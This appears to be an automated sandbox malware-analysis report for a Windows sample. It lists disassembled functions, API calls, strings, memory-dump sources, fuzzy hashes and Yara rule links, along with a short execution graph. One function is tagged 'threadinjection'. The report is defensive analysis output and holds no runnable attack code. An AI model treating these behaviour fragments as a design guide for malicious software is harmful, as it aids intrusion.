                                                                                                  • API String ID: 1035833867-0
                                                                                                  • Opcode ID: 607634bbb8f49ba6cbd8bab95c531d1dfafda2404a83de7d5cdd7296bfdd92da
                                                                                                  • Instruction ID: e27e4c2e15a8ba7049291364030d09d0c1c078718807e8ad9c1834eed021eb94
                                                                                                  • Opcode Fuzzy Hash: 607634bbb8f49ba6cbd8bab95c531d1dfafda2404a83de7d5cdd7296bfdd92da
                                                                                                  • Instruction Fuzzy Hash: 3BE01231E6A721FBD3615B61BC0DFDF3E58AB06B52F018109FA05961E0DBB486089BA1
                                                                                                  Function 0091A80C Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 237COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                    • Part of subcall function 0091A699: GetDC.USER32(00000000), ref: 0091A69D
                                                                                                    • Part of subcall function 0091A699: GetDeviceCaps.GDI32(00000000,0000000C), ref: 0091A6A8
                                                                                                    • Part of subcall function 0091A699: ReleaseDC.USER32(00000000,00000000), ref: 0091A6B3
                                                                                                  • GetObjectW.GDI32(?,00000018,?), ref: 0091A83C
                                                                                                    • Part of subcall function 0091AAC9: GetDC.USER32(00000000), ref: 0091AAD2
                                                                                                    • Part of subcall function 0091AAC9: GetObjectW.GDI32(?,00000018,?), ref: 0091AB01
                                                                                                    • Part of subcall function 0091AAC9: ReleaseDC.USER32(00000000,?), ref: 0091AB99
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ObjectRelease$CapsDevice
                                                                                                  • String ID: (
                                                                                                  • API String ID: 1061551593-3887548279
                                                                                                  • Opcode ID: bbcb553b2f351a82e26744d8ce6814d0d096c90b9bdbbffca6cc063944e9deaa
                                                                                                  • Instruction ID: 58376559f0c0c04280ce00d2439ef255e46bc0d199267e8a3205881502cd6d00
                                                                                                  • Opcode Fuzzy Hash: bbcb553b2f351a82e26744d8ce6814d0d096c90b9bdbbffca6cc063944e9deaa
                                                                                                  • Instruction Fuzzy Hash: 4D91FE71608344AFD610DF25C844A6BBBE9FFC9711F00895EF99AD3220DB70A946DF62
                                                                                                  Function 009075DE Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 137timeCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • __EH_prolog.LIBCMT ref: 009075E3
                                                                                                    • Part of subcall function 009105DA: _wcslen.LIBCMT ref: 009105E0
                                                                                                    • Part of subcall function 0090A56D: FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 0090A598
                                                                                                  • SetFileTime.KERNEL32(?,?,?,?,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 0090777F
                                                                                                    • Part of subcall function 0090A4ED: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,0090A325,?,?,?,0090A175,?,00000001,00000000,?,?), ref: 0090A501
                                                                                                    • Part of subcall function 0090A4ED: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,0090A325,?,?,?,0090A175,?,00000001,00000000,?,?), ref: 0090A532
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: File$Attributes$CloseFindH_prologTime_wcslen
                                                                                                  • String ID: :
                                                                                                  • API String ID: 3226429890-336475711
                                                                                                  • Opcode ID: c9b939617b49323fa517d84249a4689161cd83683b6eccc45821c3e989a6ce1d
                                                                                                  • Instruction ID: 6430f2a18d9289a7113216d6354054cbb3ea45ca630aad192a9857099d62fe40
                                                                                                  • Opcode Fuzzy Hash: c9b939617b49323fa517d84249a4689161cd83683b6eccc45821c3e989a6ce1d
                                                                                                  • Instruction Fuzzy Hash: 72416071901258ADEB25EB64CC55FEEB37DAF81340F004096B60AA60D2DB746F85CF71
                                                                                                  Function 0091B48E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 77COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: _wcslen
                                                                                                  • String ID: }
                                                                                                  • API String ID: 176396367-4239843852
                                                                                                  • Opcode ID: bb2c840937f83caa2a04629b0e68ff39dc8175150497ed57dd4c6b9776069426
                                                                                                  • Instruction ID: 665460d82057bd5f236428de04308903e32db7f9db9deabcabc23e53bd14e79d
                                                                                                  • Opcode Fuzzy Hash: bb2c840937f83caa2a04629b0e68ff39dc8175150497ed57dd4c6b9776069426
                                                                                                  • Instruction Fuzzy Hash: 5921DE72B0431E5AD731EB64E845FAAB3EEDF91754F04042AF680C3145EB78DD8883A2
                                                                                                  Function 0090F344 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 67COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                    • Part of subcall function 0090F2C5: GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 0090F2E4
                                                                                                    • Part of subcall function 0090F2C5: GetProcAddress.KERNEL32(009481C8,CryptUnprotectMemory), ref: 0090F2F4
                                                                                                  • GetCurrentProcessId.KERNEL32(?,?,?,0090F33E), ref: 0090F3D2
                                                                                                  Strings
                                                                                                  • CryptUnprotectMemory failed, xrefs: 0090F3CA
                                                                                                  • CryptProtectMemory failed, xrefs: 0090F389
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: AddressProc$CurrentProcess
                                                                                                  • String ID: CryptProtectMemory failed$CryptUnprotectMemory failed
                                                                                                  • API String ID: 2190909847-396321323
                                                                                                  • Opcode ID: c33574f99e93d642a71e072b7bec51d6e444faee43bc6379a1f848bb2a8acb76
                                                                                                  • Instruction ID: 24c42a74c5cd9d9ad77acbe706d87a1f356524226f95bafbddefbccc5a343cf3
                                                                                                  • Opcode Fuzzy Hash: c33574f99e93d642a71e072b7bec51d6e444faee43bc6379a1f848bb2a8acb76
                                                                                                  • Instruction Fuzzy Hash: E8112931604225AFDF35AF20DC55A6F3758FF447B0B048166FC415B6D1DB349F419A90
                                                                                                  Function 0090B991 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • _swprintf.LIBCMT ref: 0090B9B8
                                                                                                    • Part of subcall function 00904092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 009040A5
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: __vswprintf_c_l_swprintf
                                                                                                  • String ID: %c:\
                                                                                                  • API String ID: 1543624204-3142399695
                                                                                                  • Opcode ID: 8eb33bd7d99ca8158603faae6ad882106de25ab3d28944bd70b493200e7f6889
                                                                                                  • Instruction ID: bb7bf111905ea3a7f516119b9601dcc92e47c08121c5a577a11a0899800561dc
                                                                                                  • Opcode Fuzzy Hash: 8eb33bd7d99ca8158603faae6ad882106de25ab3d28944bd70b493200e7f6889
                                                                                                  • Instruction Fuzzy Hash: 9801F563600322BDDA30AB359C86E6BA7ECEED6770B40880AF554D60C2EB24D844C2B1
                                                                                                  Function 0091101F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49threadCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • CreateThread.KERNEL32(00000000,00010000,00911160,?,00000000,00000000), ref: 00911043
                                                                                                  • SetThreadPriority.KERNEL32(?,00000000), ref: 0091108A
                                                                                                    • Part of subcall function 00906C36: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00906C54
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Thread$CreatePriority__vswprintf_c_l
                                                                                                  • String ID: CreateThread failed
                                                                                                  • API String ID: 2655393344-3849766595
                                                                                                  • Opcode ID: 4645adf7adaa34429fdffe8e202a077ebc8853c6d40a810ff415951fe47003d0
                                                                                                  • Instruction ID: 3c82654a8a40b5d571e321cf04fc1dc8b88055a6e7330a8424c57027400e9963
                                                                                                  • Opcode Fuzzy Hash: 4645adf7adaa34429fdffe8e202a077ebc8853c6d40a810ff415951fe47003d0
                                                                                                  • Instruction Fuzzy Hash: 9501DB7534430D7FD3345E649C52FB673A8EB84751F10002EF787561C0DAA168C49A24
                                                                                                  Function 00901316 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                    • Part of subcall function 0090E2E8: _swprintf.LIBCMT ref: 0090E30E
                                                                                                    • Part of subcall function 0090E2E8: _strlen.LIBCMT ref: 0090E32F
                                                                                                    • Part of subcall function 0090E2E8: SetDlgItemTextW.USER32(?,0093E274,?), ref: 0090E38F
                                                                                                    • Part of subcall function 0090E2E8: GetWindowRect.USER32(?,?), ref: 0090E3C9
                                                                                                    • Part of subcall function 0090E2E8: GetClientRect.USER32(?,?), ref: 0090E3D5
                                                                                                  • GetDlgItem.USER32(00000000,00003021), ref: 0090135A
                                                                                                  • SetWindowTextW.USER32(00000000,009335F4), ref: 00901370
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ItemRectTextWindow$Client_strlen_swprintf
                                                                                                  • String ID: 0
                                                                                                  • API String ID: 2622349952-4108050209
                                                                                                  • Opcode ID: d048d7c50afb1f79c7a744dab0ff582d7713aa6ea3579549534f62b0ef8bdadb
                                                                                                  • Instruction ID: 3cc71b8c1254bbac3217f8f0863a239068202d0be0a87db73fda29e2005a7544
                                                                                                  • Opcode Fuzzy Hash: d048d7c50afb1f79c7a744dab0ff582d7713aa6ea3579549534f62b0ef8bdadb
                                                                                                  • Instruction Fuzzy Hash: 42F0AF3110838CAFDF150F608C0DBEA3B9CAF41344F048519FC44509E1CB78C990EB10
                                                                                                  Function 00910FE4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19synchronizationCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • WaitForSingleObject.KERNEL32(?,000000FF,00911206,?), ref: 00910FEA
                                                                                                  • GetLastError.KERNEL32(?), ref: 00910FF6
                                                                                                    • Part of subcall function 00906C36: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00906C54
                                                                                                  Strings
                                                                                                  • WaitForMultipleObjects error %d, GetLastError %d, xrefs: 00910FFF
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ErrorLastObjectSingleWait__vswprintf_c_l
                                                                                                  • String ID: WaitForMultipleObjects error %d, GetLastError %d
                                                                                                  • API String ID: 1091760877-2248577382
                                                                                                  • Opcode ID: 7289fc3120199d7a65ac9611a4031f2ff3311a71bdd63a7e50c1373fa567a9d2
                                                                                                  • Instruction ID: d56faa0cf3762ac9d095b330369f2aa51998241f9447bfcde8f8b0acce9fef05
                                                                                                  • Opcode Fuzzy Hash: 7289fc3120199d7a65ac9611a4031f2ff3311a71bdd63a7e50c1373fa567a9d2
                                                                                                  • Instruction Fuzzy Hash: C0D02B315485303AD62433249D06D6E3904CB52331F104708F279511E1CB1449D16A91
                                                                                                  Function 0090E29E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • GetModuleHandleW.KERNEL32(00000000,?,0090DA55,?), ref: 0090E2A3
                                                                                                  • FindResourceW.KERNEL32(00000000,RTL,00000005,?,0090DA55,?), ref: 0090E2B1
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: FindHandleModuleResource
                                                                                                  • String ID: RTL
                                                                                                  • API String ID: 3537982541-834975271
                                                                                                  • Opcode ID: bc13cb2868dc71f273f7785e5759629f7bd886631d9359dffa13ac4a92134ea6
                                                                                                  • Instruction ID: 0a1780676497a2eb135f782a4fe1a07a5468f8e4ce198afb734a16c8b88f2844
                                                                                                  • Opcode Fuzzy Hash: bc13cb2868dc71f273f7785e5759629f7bd886631d9359dffa13ac4a92134ea6
                                                                                                  • Instruction Fuzzy Hash: 56C0123169A7106AEA3427686D4DB836A585B00B16F094948B281EE2D1DAA5C980DAA0
                                                                                                  Function 0092BEE0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 6COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CommandLine
                                                                                                  • String ID: `%t
                                                                                                  • API String ID: 3253501508-135100400
                                                                                                  • Opcode ID: 07bbe19662da8b5953cfa5a8bfb8c3c6bfe7aae9f53cbd94a17f3a423a374fd7
                                                                                                  • Instruction ID: 16e89c2888939a233d6a8c17c2f186f6adbfaf43b292d0251859e25ddbfca69b
                                                                                                  • Opcode Fuzzy Hash: 07bbe19662da8b5953cfa5a8bfb8c3c6bfe7aae9f53cbd94a17f3a423a374fd7
                                                                                                  • Instruction Fuzzy Hash: 9BB092B887C7088FD7008FB0F80C0047BA0BA08302380985BD802C6730DB744189FF00

                                                                                                  Execution Graph

                                                                                                  Execution Coverage:2.8%
                                                                                                  Dynamic/Decrypted Code Coverage:75%
                                                                                                  Signature Coverage:0%
                                                                                                  Total number of Nodes:12
                                                                                                  Total number of Limit Nodes:0
                                                                                                  execution_graph 15144 7ffd9bba2455 15145 7ffd9bba246f GetFileAttributesW 15144->15145 15147 7ffd9bba2535 15145->15147 15148 7ffd9bba07d9 15149 7ffd9bba07e7 CloseHandle 15148->15149 15151 7ffd9bba08c4 15149->15151 15136 7ffd9bba067c 15137 7ffd9bba06a0 ResumeThread 15136->15137 15139 7ffd9bba0784 15137->15139 15140 7ffd9bb9ee3d 15141 7ffd9bb9ee4b SuspendThread 15140->15141 15143 7ffd9bb9ef24 15141->15143

                                                                                                  Executed Functions

                                                                                                  Function 00007FFD9B9E0D70 Relevance: .3, Instructions: 295COMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000005.00000002.1961756771.00007FFD9B9E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9E0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_5_2_7ffd9b9e0000_serverBrokerperfMonitor.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: cddf4eaaddad0ef8741f5d5e8d1001d66a22a784ad4073ca9bff2335aad1748d
                                                                                                  • Instruction ID: fe13b690017c2a8829cef46b3603bf3ae1f62373c649be1fe1d6968b7eaf0bda
                                                                                                  • Opcode Fuzzy Hash: cddf4eaaddad0ef8741f5d5e8d1001d66a22a784ad4073ca9bff2335aad1748d
                                                                                                  • Instruction Fuzzy Hash: 98A1C271A1898D9FEB98DB68D865BA97FE1FF55310F0001BEE009D72D6DB782841CB40
                                                                                                  Function 00007FFD9B9E0B47 Relevance: 2.6, Strings: 2, Instructions: 71COMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000005.00000002.1961756771.00007FFD9B9E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9E0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_5_2_7ffd9b9e0000_serverBrokerperfMonitor.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: c9$!k9
                                                                                                  • API String ID: 0-3254877420
                                                                                                  • Opcode ID: b5ca1b83ae477db99f7afbd5e17e07ed95a200bfa5cfa14eabd018e335ca11bb
                                                                                                  • Instruction ID: b64002f6e75f6f1d4906d3e8de79d3bbeb609f0fb942b40dbb53c63756e32d5a
                                                                                                  • Opcode Fuzzy Hash: b5ca1b83ae477db99f7afbd5e17e07ed95a200bfa5cfa14eabd018e335ca11bb
                                                                                                  • Instruction Fuzzy Hash: 0311AF32A2824D9FDB44DF6CD8919EA37A4FB98324B010176F849D7261C730A565CB91
                                                                                                  Function 00007FFD9BBA067C Relevance: 1.7, APIs: 1, Instructions: 163threadCOMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000005.00000002.1965042803.00007FFD9BB90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB90000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_5_2_7ffd9bb90000_serverBrokerperfMonitor.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ResumeThread
                                                                                                  • String ID:
                                                                                                  • API String ID: 947044025-0
                                                                                                  • Opcode ID: 6406da5930fb70b9375b22125064065babfe1a1901fa48937fbcfb575280a854
                                                                                                  • Instruction ID: f1e53d4baa65e373ba73b8cb58249d3fab849be573b9a85d9ff336117a398c2b
                                                                                                  • Opcode Fuzzy Hash: 6406da5930fb70b9375b22125064065babfe1a1901fa48937fbcfb575280a854
                                                                                                  • Instruction Fuzzy Hash: 01514A7090978C8FDB55DFA8C854AE9BBF0FF56310F1441ABD049DB2A2DA399846CB11
                                                                                                  Function 00007FFD9BB9EE3D Relevance: 1.6, APIs: 1, Instructions: 140threadinjectionCOMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 19 7ffd9bb9ee3d-7ffd9bb9ee49 20 7ffd9bb9ee4b-7ffd9bb9ee53 19->20 21 7ffd9bb9ee54-7ffd9bb9ef22 SuspendThread 19->21 20->21 25 7ffd9bb9ef2a-7ffd9bb9ef74 21->25 26 7ffd9bb9ef24 21->26 26->25
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000005.00000002.1965042803.00007FFD9BB90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB90000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_5_2_7ffd9bb90000_serverBrokerperfMonitor.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: SuspendThread
                                                                                                  • String ID:
                                                                                                  • API String ID: 3178671153-0
                                                                                                  • Opcode ID: a2a122b7c698c668747bfb5f2f511d49a4502a200567cd0f7d0de3c1fdd3a003
                                                                                                  • Instruction ID: 1ca8de0bd4f914b64fd248a5eb83c811d0e1474073c9afd1271d1b61d582b1f9
                                                                                                  • Opcode Fuzzy Hash: a2a122b7c698c668747bfb5f2f511d49a4502a200567cd0f7d0de3c1fdd3a003
                                                                                                  • Instruction Fuzzy Hash: 6C415C70E08A4D8FDF58DF98C895BEDBBF0FB5A310F10416AD449E7292DA70A845CB41
                                                                                                  Function 00007FFD9BBA2455 Relevance: 1.6, APIs: 1, Instructions: 132COMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 29 7ffd9bba2455-7ffd9bba2533 GetFileAttributesW 33 7ffd9bba2535 29->33 34 7ffd9bba253b-7ffd9bba2579 29->34 33->34
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000005.00000002.1965042803.00007FFD9BB90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB90000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_5_2_7ffd9bb90000_serverBrokerperfMonitor.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: AttributesFile
                                                                                                  • String ID:
                                                                                                  • API String ID: 3188754299-0
                                                                                                  • Opcode ID: 90546486bf730c7229643badcf29c3186f9571a0b098dffc0b07c47280cf1e05
                                                                                                  • Instruction ID: 932ddac39b675bd982c8f4eaa2e6e2caa6d72e9b2b93b6995e2ebd02d05523b4
                                                                                                  • Opcode Fuzzy Hash: 90546486bf730c7229643badcf29c3186f9571a0b098dffc0b07c47280cf1e05
                                                                                                  • Instruction Fuzzy Hash: 67410A70E0864C8FDB98DF98D895BEDBBF1FB5A310F10416ED049E7252DA71A885CB41
